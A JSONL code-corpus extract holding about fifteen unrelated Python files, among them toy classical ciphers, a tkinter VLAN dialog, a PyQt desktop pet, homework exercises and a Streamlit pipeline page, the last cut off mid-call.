+{"seq_id":"71385277660","text":"import datetime\nimport hashlib\n\n\n# Caesar encryption\n\n# шифрование текста\ndef encrypt_caesar(msg, k):\n return shift_caesar(msg, k)\n\n\n# дешифрование текста\ndef decrypt_caesar(msg, k):\n return shift_caesar(msg, -k)\n\n\n# функция сдвига символов сообщения msg на key позиций\ndef shift_caesar(msg, key):\n shifted = []\n for letter in msg:\n shifted.append(chr((ord(letter) + key) % 65536))\n return ''.join(shifted)\n\n\n# Vigenere encryption\n\n# вспомогательная функция доформирования ключа\ndef key_vigenere(n, k):\n diff = n - len(k)\n if diff > 0:\n k += (diff // len(k)) * k + k[:diff % len(k)]\n key = []\n for letter in k:\n key.append(int(letter))\n return key\n\n\n# шифрование текста\ndef encrypt_vigenere(msg, k):\n if not k.isdigit():\n return \"Wrong format of the key\"\n return shift_vigenere(msg, key_vigenere(len(msg), k))\n\n\n# дешифрование текста\ndef decrypt_vigenere(msg, k):\n if not k.isdigit():\n return \"Wrong format of the key\"\n return shift_vigenere(msg, [i * (-1) for i in key_vigenere(len(msg), k)])\n\n\n# функция сдвига символов сообщения msg на key позиций\ndef shift_vigenere(msg, key):\n shifted = []\n for i, letter in enumerate(msg):\n shifted.append(chr((ord(letter) + key[i]) % 65536))\n return ''.join(shifted)\n\n\n# OTP (Vernam) generation\n\ndef encrypt_otp(msg, key):\n if len(msg) != len(key):\n return \"Wrong length\"\n result = []\n for i in range(len(msg)):\n key_bin = ''.join(format(ord(key[i]), 'b'))\n msg_bin = ''.join(format(ord(msg[i]), 'b'))\n result.append(int(\"0b\" + ''.join([str(int(msg_bin[j]) ^ int(key_bin[j])) for j in range(7)]), 2))\n return result\n\n\n# Blockchain\n\nclass BlockChain:\n\n def __init__(self, index, timestamp, msg, last_key):\n self.index = index\n self.timestamp = timestamp\n self.msg = msg\n self.last_key = last_key\n self.key = self.keygen()\n\n # шифрование и создание блока шифротекста\n def keygen(self):\n sha = hashlib.sha256()\n sha.update((str(self.index) + str(self.timestamp) + str(self.msg) + str(self.last_key)).encode('utf-8'))\n return sha.hexdigest()\n\n# создание следущего блока\ndef next_block(block):\n index = block.index + 1\n timestamp = datetime.datetime.now()\n msg = \"New block \" + str(index)\n key = block.key\n return BlockChain(index, timestamp, msg, key)\n\n# создание первого блока\ndef create_first_block():\n return BlockChain(0, datetime.datetime.now(), \"Start chain\", \"0\")\n\n\n# Feistel network\n\nkey = 'Abcdefg'\nposition = 0\n\n# шифрование текста\ndef encrypt_festel(msg):\n global position\n if len(msg) % 2 != 0:\n msg = msg + ' '\n result = []\n for i in range(0, len(msg), 2):\n result.append(shift_festel(ord(msg[i]), ord(msg[i + 1]), 1))\n position -= 1\n return ''.join(result)\n\n\n# дешифрование текста\ndef decrypt_festel(msg):\n if len(msg) % 2 != 0:\n msg = msg + ' '\n result = []\n for i in range(len(msg) - 1, -1, -2):\n result.insert(0, shift_festel(ord(msg[i - 1]), ord(msg[i]), -1))\n return ''.join(result)\n\n\n# алгоритм сети Фейстеля\ndef shift_festel(L, R, pos):\n global position\n for i in range(16):\n k = ord(key[position % len(key)])\n L, R = R ^ (L ^ k), L\n position += pos\n return chr(R) + chr(L)\n\n\ntext = 'What is a wonderful night'\n\nprint(text)\ns = encrypt_caesar(text, 7)\nprint(s)\nprint(decrypt_caesar(s, 7))\nprint()\nprint(text)\ns = encrypt_vigenere(text, \"357689\")\nprint(s)\nprint(decrypt_vigenere(s, \"357689\"))\nprint()\nprint(text)\ns = 
encrypt_festel(text)\nprint(s)\nprint(decrypt_festel(s))\nprint()\nprint(encrypt_otp(\"LONDON\", \"SYSTEM\"))\n","repo_name":"ElizavetaWow/NetworkTech","sub_path":"Ecryption/ecryption.py","file_name":"ecryption.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18951667728","text":"from tkinter import *\nfrom tkinter import ttk\nimport tkinter as tk\n\n\nclass DeviceConfigVlansView(tk.Toplevel):\n def __init__(self, rootWindow,controller, name, dataVlans):\n super().__init__(rootWindow, height=673, width=762, bg=\"white\", highlightbackground=\"#00A2FF\", highlightthickness=4)\n self.controller = controller\n self.name = name\n self.dataVlans = dataVlans\n self.resizable(width=True, height=True)\n #self.configure(background=\"#D9D9D9\")\n self.geometry(\"530x450\")\n self.title(\"Config Routing de {}.\".format(name))\n self.update()\n self.data = {\n \"vlanId\": \"\",\n \"vlanNom\": \"\",\n \"layer3\": {\n \"ip\": \"\"\n }}\n self.createView(name)\n\n\n def createView(self, name):\n imgBtnAccept = PhotoImage(file = 'Vista/assets/btn_accept_config.png')\n imgBtnCancel = PhotoImage(file = 'Vista/assets/btn_cancel_config.png')\n imgLineaBg = PhotoImage(file = 'Vista/assets/linea_bg.png')\n self.image = imgLineaBg\n\n titLabel = Label(self)\n titLabel.place(relx=0.18, rely=0.089, height=21, width=389)\n titLabel.configure(font=\"-family {Andale Mono} -size 17\")\n titLabel.configure(text=\"Configuracion de VLANs en {}\".format(self.name))\n\n vidLabel = Label(self)\n vidLabel.place(relx=0.083, rely=0.27, height=19, width=65)\n vidLabel.configure(font=\"-family {Andale Mono}\")\n vidLabel.configure(relief=\"flat\")\n vidLabel.configure(anchor='w')\n vidLabel.configure(justify='left')\n vidLabel.configure(text='''VLAN ID''')\n\n self.vidEntry = Entry(self)\n self.vidEntry.place(relx=0.217, rely=0.267, height=25, relwidth=0.123)\n self.vidEntry.configure(background=\"#ABE0FF\")\n self.vidEntry.configure(font=\"-family {Andale Mono}\")\n\n\n nomLabel= Label(self)\n nomLabel.place(relx=0.05, rely=0.41, height=19, width=90)\n nomLabel.configure(font=\"-family {Andale Mono}\")\n nomLabel.configure(relief=\"flat\")\n nomLabel.configure(anchor='w')\n nomLabel.configure(justify='left')\n nomLabel.configure(text='''Nombre VLAN''')\n\n self.nomEntry = Entry(self)\n self.nomEntry.place(relx=0.25, rely=0.4, height=25, relwidth=0.157)\n self.nomEntry.configure(background=\"#ABE0FF\")\n self.nomEntry.configure(font=\"TkFixedFont\")\n\n\n sviLabel = Label(self)\n sviLabel.place(relx=0.1, rely=0.533, height=19, width=195)\n sviLabel.configure(font=\"-family {Andale Mono} -size 15\")\n sviLabel.configure(relief=\"flat\")\n sviLabel.configure(anchor='w')\n sviLabel.configure(justify='left')\n sviLabel.configure(text='''Habilitar Int. 
Virtual''')\n\n self.sviEntryIp = Entry(self)\n self.sviEntryIp.place(relx=0.117, rely=0.644, height=25, relwidth=0.157)\n self.sviEntryIp.configure(background=\"#ABE0FF\")\n self.sviEntryIp.configure(disabledforeground=\"#a3a3a3\")\n self.sviEntryIp.configure(font=\"TkFixedFont\")\n\n\n self.sviEntryMask = Entry(self)\n self.sviEntryMask.place(relx=0.33, rely=0.644, height=25, relwidth=0.057)\n self.sviEntryMask.configure(background=\"#ABE0FF\")\n self.sviEntryMask.configure(font=\"TkFixedFont\")\n\n\n auxLabel = Label(self)\n auxLabel.place(relx=0.267, rely=0.644, height=21, width=34)\n auxLabel.configure(text='''/''')\n\n ipLabel = Label(self)\n ipLabel.place(relx=0.05, rely=0.644, height=21, width=34)\n ipLabel.configure(font=\"-family {Andale Mono}\")\n ipLabel.configure(text='''IP''')\n\n scrollbar = Scrollbar(self)\n scrollbar.pack(side=RIGHT, fill=Y)\n textbox = Text(self)\n textbox.place(relx=0.58, rely=0.27, relheight=0.7, relwidth=0.4)\n textbox.insert(INSERT, self.dataVlans)\n # attach textbox to scrollbar\n textbox.config(yscrollcommand=scrollbar.set)\n scrollbar.config(command=textbox.yview)\n\n btnAccept = tk.Button(self,\n text='Accept',\n image=imgBtnAccept, compound='center',\n fg=\"white\", font=(\"Andale Mono\", 10),\n command=lambda:self.acceptClick())\n btnAccept.image = imgBtnAccept\n btnAccept.place(relx=0.08, rely=0.94)\n btnCancel = tk.Button(self, text='Cancel',\n image=imgBtnCancel,font=(\"Andale Mono\", 10) ,\n compound='center', fg=\"white\", command=lambda: self.destroy())\n btnCancel.image = imgBtnCancel\n btnCancel.place(relx=0.25, rely=0.94)\n raya = tk.Canvas(self)\n raya.place(relx=0.55, rely=0.226, relheight=0.651\n , relwidth=0.001)\n raya.configure(borderwidth=\"2\")\n raya.configure(highlightbackground=\"#000000\")\n raya.configure(insertbackground=\"black\")\n raya.configure(relief=\"ridge\")\n\n def acceptClick(self):\n self.data['vlanId']= int(self.vidEntry.get())\n self.data['vlanNom'] = self.nomEntry.get()\n if self.sviEntryIp.get() != '' and self.sviEntryMask.get() != '':\n self.data['layer3']['ip'] = \"{}/{}\".format(self.sviEntryIp.get(), self.sviEntryMask.get())\n print(self.data)\n self.controller.createVlans(self, self.data, self.name)\n","repo_name":"willypalacin/TFG-Guillermo-Palacin","sub_path":"Frontend/Vista/DeviceConfigVlansView.py","file_name":"DeviceConfigVlansView.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19341359957","text":"from bs4 import BeautifulSoup\nimport requests\n\ndef checkQuestions(username):\n url = 'https://leetcode.com/' + username + '/'\n response = requests.get(url, timeout=5)\n content = BeautifulSoup(response.content, \"html.parser\")\n questions = content.find_all('span', attrs={\"class\": \"badge progress-bar-success\"})\n totalq = questions[1].text\n totalq = totalq.strip()\n print(totalq)\n totals = totalq.split('/')\n return totals[0]","repo_name":"lct45/leetcode-reminder-bot","sub_path":"leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"34243968025","text":"from copy import deepcopy\nfrom abc import ABC\n\n\nclass Cargo:\n def __init__(self, weight, volume):\n self.weight = weight\n self.volume = volume\n\n def __str__(self):\n return f\"V{self.weight}\"\n\n\nclass Order(ABC):\n pass\n\n\nclass Prototype(Order):\n def __init__(self, cargo: Cargo, price, description):\n self.price = price\n self.cargo = cargo\n self.description = description\n\n def __str__(self):\n return f\"prototype description:{self.description} price:{self.price} weight:{self.cargo.weight}\"\n\n\nif __name__ == \"__main__\":\n order1 = Prototype(Cargo(3.5, 4), 5, \"some\")\n order2 = deepcopy(order1)\n order2.price = 10\n order2.cargo.weight = 5.0\n print(order1)\n print(order2)\n","repo_name":"IlliaShuba/gof","sub_path":"python/prototype/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20444730780","text":"'''\r\n27651 벌레컷 - 누적 합, 이분 탐색 - Gold III\r\n숫자 리스트가 주어지면 이를 머리, 가슴, 배로 삼등분 하는데, 등분된 세 개의 sublist의 sum의 크기가 1 3 2 순서여야 하는 문제이다.\r\n우선 누적합을 저장하는 리스트 d를 만들어 시간을 단축한다.\r\n머리를 원소 하나에서 늘려가면서 for문을 돌린다. i까지가 머리에 해당한다. 삼등분이 가능한 최대의 i값인 n-3까지 진행한다.\r\n첫 번째 이분 탐색은 가슴-배 경계의 upper bound를 찾기 위한 코드이다.\r\n가슴의 크기는 생각하지 않고, 머리와 배의 크기만 비교한다.\r\ni+1~n-1 사이에서 진행하여, 배가 머리보다 클 수 있는 경계의 최댓값을 찾는다.\r\n위에서 찾은 값이 i와 같��면 해당 머리의 크기에서는 조건 만족이 불가능하다는 의미이므로 break한다.\r\n두 번째 이분 탐색은 가슴-배 경계의 lower bound를 찾기 위한 코드이다.\r\n머리의 크기에 관계없이 가슴이 배보다 클 수 있는 경계의 최솟값을 찾는다.\r\n두 탐색에서 구한 값 사이에 경계를 놓으면 무조건 문제에서 원하는 조건을 만족한다.\r\n따라서 두 값 사이에서 가능한 경계의 경우의 수를 취한다. 이 값들을 for문 전체에서 더하여 출력한다.\r\n\r\n이분 탐색 두 개에서 1 차이의 값을 설정하는 것이 어려웠다.\r\n기존 이분 탐색은 while s<=e, s=m+1, e=m-1을 사용하는데 반해 조금 달라서 어려움을 겪었다.\r\n\r\n마지막에 두 값이 같을 때는 해당 경계에서도 만족하지 않는 결과가 나올 수 있기 때문에 이를 보완하였다.\r\n예를 들어, [1,1,1,1,1]에서 a1,a2가 2가 나오는데, 이 경우 1/2/2가 되기 때문에 불가능하다.\r\n'''\r\nn = int(input())\r\nl = list(map(int, input().split()))\r\nd = [0]*n\r\nt = 0\r\nfor i in range(n): # 누적 합 만들기\r\n t += l[i]\r\n d[i] = t\r\ns, e = 0, n-1\r\nans = 0\r\nfor i in range(n-2): # a를 d[i]로 두고 진행\r\n a = d[i]\r\n s, e = i+1, n-1\r\n while s < e: # y의 upper bound 찾기 - 최소 여기에는 있어야 ac 만족.\r\n m = (s+e)//2\r\n if t-d[m] < d[m]-a:\r\n e = m\r\n else:\r\n s = m+1\r\n a2 = e\r\n #print(i, a1, a2)\r\n if a1 == a2:\r\n if t-d[a1] < d[a1]-a and a < t-d[a1]:\r\n ans += 1\r\n else:\r\n ans += a1-a2+1\r\nprint(ans)\r\n","repo_name":"evermade1/baekjoon","sub_path":"Binary Search/27651 벌레컷 - 이분 탐색, 누적 합.py","file_name":"27651 벌레컷 - 이분 탐색, 누적 합.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11831606330","text":"# U06_Ex03_SphereAreaVol.py\n#\n# Author: Bill Montana\n# Course: Coding for OOP\n# Section: A3\n# Date: 21 Oct 2017\n# IDE: PyCharm Community Edition\n#\n# Assignment Info\n# Exercise: 3\n# Source: Python Programming\n# Chapter: 6\n#\n# Program Description\n# Solve PE 3.1 using functions sphereArea() and sphereVolume()\n# Calculates the volume and surface area of a sphere from its radius,\n# given as input.\n#\n# Algorithm (pseudocode)\n# introduce program\n# get radius (float) from user\n# get units (str) for radius\n# call sphereArea() with radius as parameter; assign to area var\n# call sphereVolume() with radius as parameter; assign to volume var\n# display results\n#\n# sphereArea()\n# r is argument\n# calculate and return surface area\n# A = 4 * math.pi * r*r\n#\n# sphereVolume()\n# r is argument\n# calculate volume and surface area\n# V = 4 / 3 * math.pi * r*r*r\n\n\n\n\nimport math\n\ndef main():\n # introduce program\n print(\"\\nThis program calculates the volume and surface area of a sphere.\\n\")\n\n # get radius (float) from user\n radius = float(input(\"What is the sphere's radius? \"))\n\n # get units (str) for radius\n units = str(input(\"What are the units for the radius? \"))\n\n # call sphereArea() with radius as parameter; assign to area var\n area = sphereArea(radius)\n\n # call sphereVolume() with radius as parameter; assign to volume var\n volume = sphereVolume(radius)\n\n # display results\n print((\"\\nA sphere with radius {0:.3f} \" + units + \" has a volume of {1:.3f} cubic \" + \\\n units + \" and a surface area of {2:.3f} square \" + units + \".\").format(radius, volume, area))\n\n# sphereArea()\n# r is argument\ndef sphereArea(r):\n # calculate and return surface area\n # A = 4 * math.pi * r*r\n area = 4 * math.pi * math.pow(r, 2)\n return area\n\n# sphereVolume()\n# r is argument\ndef sphereVolume(r):\n # calculate volume and surface area\n # V = 4 / 3 * math.pi * r*r*r\n volume = 4 / 3 * math.pi * math.pow(r, 3)\n return volume\n\n\nif __name__ == '__main__':\n main()","repo_name":"billm79/COOP2018","sub_path":"Chapter06/U06_Ex03_SphereAreaVol.py","file_name":"U06_Ex03_SphereAreaVol.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"5159101682","text":"import sys\nimport random\nimport webbrowser\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import Qt, QTimer\nfrom PyQt5 import QtWidgets, QtGui\n\nclass MyMikuPet(QWidget):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n quit = QAction(\"退出\", self, triggered=self.close)\n quit.setIcon(QIcon(\"img/icon.png\"))\n addPet = QAction(\"添加一个Miku\", self, triggered = addOnePet)\n addPet.setIcon(QIcon(\"img/icon.png\"))\n removePet = QAction(\"移除一个Miku\", self, triggered = delOnePet)\n removePet.setIcon(QIcon(\"img/icon.png\"))\n about = QAction(\"About\", self, triggered=aboutInfo)\n about.setIcon(QIcon(\"img/icon.png\"))\n self.pet = myPet()\n self.trayIconMenu = QMenu(self)\n self.trayIconMenu.addAction(addPet)\n self.trayIconMenu.addAction(removePet)\n self.trayIconMenu.addAction(about)\n self.trayIconMenu.addAction(quit)\n self.trayIcon = QSystemTrayIcon(self)\n self.trayIcon.setIcon(QIcon(\"img/icon.png\"))\n self.trayIcon.setContextMenu(self.trayIconMenu)\n self.trayIcon.show()\n\ndef addOnePet():\n pets.append(myPet())\n\ndef delOnePet():\n if len(pets)==0:\n return\n del pets[len(pets)-1]\n\ndef aboutInfo():\n webbrowser.open_new_tab(\"https://github.com/luxingwen/desktop-pet-miku\")\n\nclass myPet(QWidget):\n def __init__(self, parent = None):\n QtWidgets.QWidget.__init__(self)\n self.initUI()\n\n def initUI(self):\n self.setWindowFlags(Qt.FramelessWindowHint|Qt.WindowStaysOnTopHint|Qt.SubWindow)\n self.setAutoFillBackground(False)\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.repaint()\n self.img = QLabel(self)\n self.actionDatas = []\n self.initData()\n self.index = 0\n self.setPic(\"shime1.png\")\n self.resize(128, 128)\n self.show()\n self.runing = False\n self.timer = QTimer()\n self.timer.timeout.connect(self.actionRun)\n self.timer.start(500)\n self.randomPos()\n\n def getImgs(self, pics):\n listPic = []\n for item in pics:\n img = QImage()\n img.load('img/'+item)\n listPic.append(img)\n return listPic\n\n def initData(self):\n imgs = self.getImgs([\"shime1b.png\", \"shime2b.png\", \"shime1b.png\", \"shime3b\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime11.png\", \"shime15.png\", \"shime16.png\", \"shime17.png\", \"shime16.png\", \"shime17.png\", \"shime16.png\", \"shime17.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime54.png\", \"shime55.png\", \"shime26.png\", \"shime27.png\", \"shime28.png\", \"shime29.png\",\"shime26.png\", \"shime27.png\", \"shime28.png\", \"shime29.png\",\"shime26.png\", \"shime27.png\", \"shime28.png\", \"shime29.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime31.png\", \"shime32.png\", \"shime31.png\", \"shime33.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime18.png\", \"shime19.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime34b.png\", \"shime35b.png\", \"shime34b.png\", \"shime36b.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime14.png\", \"shime14.png\", \"shime52.png\", \"shime13.png\", \"shime13.png\", \"shime13.png\", \"shime52.png\", \"shime14.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime42.png\", \"shime43.png\", \"shime44.png\", \"shime45.png\", \"shime46.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime1.png\", \"shime38.png\", \"shime39.png\", \"shime40.png\", \"shime41.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime25.png\", \"shime25.png\", \"shime53.png\", 
\"shime24.png\", \"shime24.png\", \"shime24.png\", \"shime53.png\", \"shime25.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime20.png\", \"shime21.png\", \"shime20.png\", \"shime21.png\", \"shime20.png\"])\n self.actionDatas.append(imgs)\n\n def actionRun(self):\n if not self.runing:\n self.action = random.randint(0, len(self.actionDatas)-1)\n self.index = 0\n self.runing = True\n self.runFunc(self.actionDatas[self.action])\n\n def setPic(self, pic):\n img = QImage()\n img.load('img/'+pic) \n self.img.setPixmap(QPixmap.fromImage(img))\n\n def runFunc(self, imgs):\n if self.index >= len(imgs):\n self.index = 0\n self.runing = False\n self.img.setPixmap(QPixmap.fromImage(imgs[self.index]))\n self.index += 1\n\n def randomPos(self):\n screen = QDesktopWidget().screenGeometry()\n size = self.geometry()\n self.move((screen.width()-size.width())*random.random(), (screen.height()-size.height())*random.random())\n\n def mousePressEvent(self, event):\n if event.button()==Qt.LeftButton:\n self.m_drag=True\n self.m_DragPosition=event.globalPos()-self.pos()\n event.accept()\n self.setCursor(QCursor(Qt.OpenHandCursor))\n def mouseMoveEvent(self, QMouseEvent):\n if Qt.LeftButton and self.m_drag:\n self.move(QMouseEvent.globalPos()-self.m_DragPosition)\n QMouseEvent.accept()\n def mouseReleaseEvent(self, QMouseEvent):\n self.m_drag=False\n self.setCursor(QCursor(Qt.ArrowCursor))\n\nif __name__ == \"__main__\":\n global pets\n pets=[]\n app = QApplication(sys.argv)\n w = MyMikuPet()\n sys.exit(app.exec_())","repo_name":"luxingwen/desktop-pet-miku","sub_path":"miku.py","file_name":"miku.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"69"}
+{"seq_id":"5995067601","text":"import sys\n\nn = int(sys.stdin.readline())\nans = 0\nfor i in range(1, n):\n result = 0\n result += i\n for j in str(i):\n result += int(j)\n if result == n:\n ans = i\n break\nprint(ans)\n","repo_name":"Lee9Bin/python_algorism","sub_path":"algorism/daily/2231.py","file_name":"2231.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23724265851","text":"import os\nimport random\nimport shutil\n\nbase_file_path = r'C:\\Users\\NailinLiao\\Desktop\\单帧车载电源动态\\camera'\ncamera_list = ['camera1', 'camera2', 'camera3']\nsave_path = r'C:\\Users\\NailinLiao\\Desktop\\ret'\nRandom_len = 300\npartition = 3\n\n\ndef get_random_file_list(get_path, Random_len):\n file_name_list = os.listdir(get_path)\n random_file_name_list = random.sample(file_name_list[10000:], Random_len)\n return random_file_name_list\n\n\ndef chunks(origin_list, n):\n if len(origin_list) % n == 0:\n cnt = len(origin_list) // n\n else:\n cnt = len(origin_list) // n + 1\n\n for i in range(0, n):\n yield origin_list[i * cnt:(i + 1) * cnt]\n\n\ndef main():\n random_file_name_list = get_random_file_list(os.path.join(base_file_path, 'camera1'), Random_len)\n chunks_list = chunks(random_file_name_list, partition)\n\n for index, chunk in enumerate(chunks_list):\n save_chunk = os.path.join(save_path, str(index))\n if not os.path.exists(save_chunk):\n os.makedirs(save_chunk)\n\n for file in chunk:\n for camera in camera_list:\n img_path = os.path.join(base_file_path, camera, file)\n img_name = str(file).split('.')[0] + '_' + str(camera) + '.png'\n shutil_path = os.path.join(save_chunk, img_name)\n print('Copy:', img_path, ' To ', shutil_path)\n try:\n shutil.copy(img_path, shutil_path)\n except:\n print('Erro:', img_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NailinLiao/DataDevelopment","sub_path":"Data_tools/CameraSynchronizationCheck.py","file_name":"CameraSynchronizationCheck.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29689642136","text":"import numpy as np\n\ndef calc_forward(i, m):\n p = len(m) - 1\n col = m[:, i]\n i_max = i + np.argmax(np.abs(col[i:]))\n if i != i_max:\n m = np.concatenate([m[:i, :], m[i_max, :][None,:], m[i+1:i_max], m[i, :][None,:], m[i_max+1:,:]], axis=0)\n \n aii = 1. / m[i, i]\n for j in range(i + 1, p + 1):\n aji = m[j, i]\n for k in range(i + 1, p + 2):\n m[j, k] = m[j, k] - aji * aii * m[i, k]\n return m\n\ndef back_substitution(m):\n num_rows = len(m)\n ret_val = np.zeros(num_rows)\n p = num_rows - 1\n\n for i in range(p, -1, -1):\n #print(i, m)\n sum_ = 0\n for j in range(i + 1, p + 1):\n sum_ += m[i, j] * ret_val[j]\n ret_val[i] = (m[i, (p + 1)] - sum_) / m[i, i]\n return ret_val\n\ndef solve_gauss(m):\n for i in range(0, len(m) - 1):\n m = calc_forward(i, m)\n print(m)\n return back_substitution(m)\n ","repo_name":"nigulo/python","sub_path":"math/linear_equations.py","file_name":"linear_equations.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"12259020482","text":"class Student:\n clg_name = 'SIET'\n clg_fee = 85000\n def __init__(self,roll_no,dept):\n self.roll_no = roll_no\n self.dept = dept\n\n def student_details(self):\n print(\"College Name: \" + self.clg_name)\n print(\"roll_no: \" + str(self.roll_no))\n print(\"dept: \" + str(self.dept))\n\nclass Hosteler(Student):\n hstl_fee = 75000\n def __init__(self,roll_no,dept,room_no):\n self.room_no = room_no\n Student.__init__(self,roll_no,dept)\n\n def student_details(self):\n print(\"College Name: \" + self.clg_name)\n print(\"roll_no: \" + str(self.roll_no))\n print(\"dept: \" + str(self.dept))\n print(\"Hostel Room No : \" + str(self.room_no))\n\ns1 = Hosteler('18cse30','CSE',112)\ns1.student_details()","repo_name":"kausic-eunimart/June-month-progress","sub_path":"June/oops_python/inheritance.py","file_name":"inheritance.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37102857062","text":"S = input()\nQ = int(input())\n\ndef g(s,add):\n return chr((ord(s)-ord('A')+add)%3+ord('A'))\n\ndef f(t,k):\n if k == 0:\n return g(S[0],t)\n if t == 0:\n return S[k]\n return g(f(t-1,k//2),k%2+1)\n\nfor i in range(Q):\n t,k = map(int,input().split())\n print(f(t,k-1))\n\n","repo_name":"seigot/atcoder","sub_path":"abc242/d/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"44130909763","text":"\"\"\"\nCleans spectras (if required) and adds equivalent noisy version of datasets\n\"\"\"\n\nimport pandas as pd\nimport pickle\nimport numpy as np\nimport click\nimport os\n\n@click.command()\n@click.option('--dataset_path',default=\"../processed/spectra_noiseless.pd\", help='path to dataset')\n@click.option('--new_name',default=\"spectra\", help='name of new dataset paths')\ndef make_dataset(dataset_path,new_name,SNs = [10,30,50,100]):\n df = pd.read_pickle(dataset_path)\n df[\"spectra\"] = df[\"spectra\"].apply(remove_zeros)\n #df.to_pickle(dataset_path)\n folder_path = os.path.split(dataset_path)[0]\n for SN in SNs:\n df_new =df.copy()\n df_new[\"spectra\"] = df_new[\"spectra\"].apply(add_noise,noise=1/SN)\n df_new.to_pickle(\"{}/{}_SN_{}.pd\".format(folder_path,new_name,SN))\n\n\ndef remove_zeros(spectra): \n return spectra[np.nonzero(spectra)[0]]\n\ndef add_noise(spectra,noise): #need to add some noise to the spectra\n noise = np.random.normal(0,noise,len(spectra))\n return noise+spectra\n\n\nif __name__ == '__main__':\n make_dataset()\n\n","repo_name":"drd13/tagging-package","sub_path":"data/scripts/noiseSpectra.py","file_name":"noiseSpectra.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26507442021","text":"# -*- coding: utf-8 -*-\nimport typing\n\nfrom streamlit.delta_generator import DeltaGenerator\n\nfrom kiara_streamlit.pipelines.pages import PipelinePage\n\n\nclass StagePage(PipelinePage):\n \"\"\"A page that renders a UI for a specific pipeline stage.\"\"\"\n\n def __init__(self, id: str, config: typing.Mapping[str, typing.Any] = None):\n\n if config is None:\n config = {}\n self._stage: int = config.get(\"stage\", None)\n if self._stage is None:\n raise Exception(\n \"Invalid config for pipeline page of type 'stage': no 'stage' configuration provided.\"\n )\n if not isinstance(self._stage, int):\n raise Exception(\n \"Invalid config for pipeline page of type 'stage': 'stage' configuration must be an integer.\"\n )\n\n super().__init__(id=id)\n\n def run_page(self, st: DeltaGenerator):\n\n # make sure all required inputs for the steps in this stage are ready\n self.check_stage_requirements_valid(self._stage)\n\n # retrieve all relevant inputs for this stage\n stage_inputs = self.get_pipeline_inputs_for_stage(self._stage)\n\n st.markdown(\"### Inputs\")\n # render a set of input components for this stage\n stage_input_data = st.kiara.valueset_input(\n stage_inputs, key=self.get_page_key(\"stage_inputs\"), defaults=stage_inputs\n )\n\n # set the inputs we got from the user\n self.set_pipeline_inputs(inputs=stage_input_data, render_errors=True)\n\n process_btn = st.button(\"Process\", key=self.get_page_key(\"process_button\"))\n\n # check if the process button was clicked\n if process_btn:\n # get updated pipeline inputs after user input\n pipeline_stage_inputs = self.get_pipeline_inputs_for_stage(self._stage)\n\n # check if all inputs are valid, otherwise render error and do nothing\n invalid = self.check_invalid_values(\n pipeline_stage_inputs, render_error=True\n )\n if not invalid:\n # process all steps in this stage\n self._cache[\"last_processing_results\"] = self.process_stage(\n self._stage, render_result=False, container=st\n )\n\n last_processing_results = self._cache.get(\"last_processing_results\", None)\n if last_processing_results is not None:\n # here we print the results of the processing (if there are any)\n # the reason this is stored in the object is to be able to display the results if the user\n # navigated away and back from/to this page\n self.render_stage_processing_result(\n last_processing_results, only_stage=self._stage, container=st\n )\n\n # let the user choose whether they want to see all step outputs\n show_step_outputs = st.checkbox(\"Show step outputs\", value=False)\n if show_step_outputs:\n # if the user wants to check step outputs, he can choose to\n for step_id in self.get_step_ids_for_stage(self._stage):\n st.write(f\"#### Step output: '{step_id}\")\n _outputs = self.get_step_outputs(step_id)\n st.kiara.write_valueset(\n _outputs, key=self.get_page_key(\"step_output_preview\"), container=st\n )\n\n # let the user choose whether they want to see pipeline outputs of this stage (if any)\n outputs = self.get_pipeline_outputs_for_stage(self._stage)\n if outputs:\n # if there are any pipeline outputs produced in this stage, display them here\n show_outputs = st.checkbox(\"Show pipeline outputs\", value=True)\n if show_outputs:\n st.kiara.write_valueset(\n outputs,\n 